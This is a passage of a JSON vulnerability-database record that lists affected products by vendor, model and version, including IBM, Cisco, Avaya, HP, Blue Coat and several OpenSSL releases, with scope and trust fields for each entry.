"eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.80" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "bladecenter js43 with feature code", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x8446)0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.51" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "power system s824", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ctp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7500" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "power systems e880", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.0" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "ctpos 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "screenos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.10" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734-" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.61" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.20" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.90" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.02" }, { "model": "bladecenter js12 express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-60x)0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.20" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "flex system p24l compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "power system s812l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731-" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "packetshaper", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73230" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "aura conferencing sp7", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363073770" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.10" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "flex system interconnect fabric", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "aura application server sip core sp10", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2(3.1)" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.20" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.6" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.01" }, { "model": "power systems 350.d0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.40" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "74.90" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.40" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5950" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "junos os 12.3x48-d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054540" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, 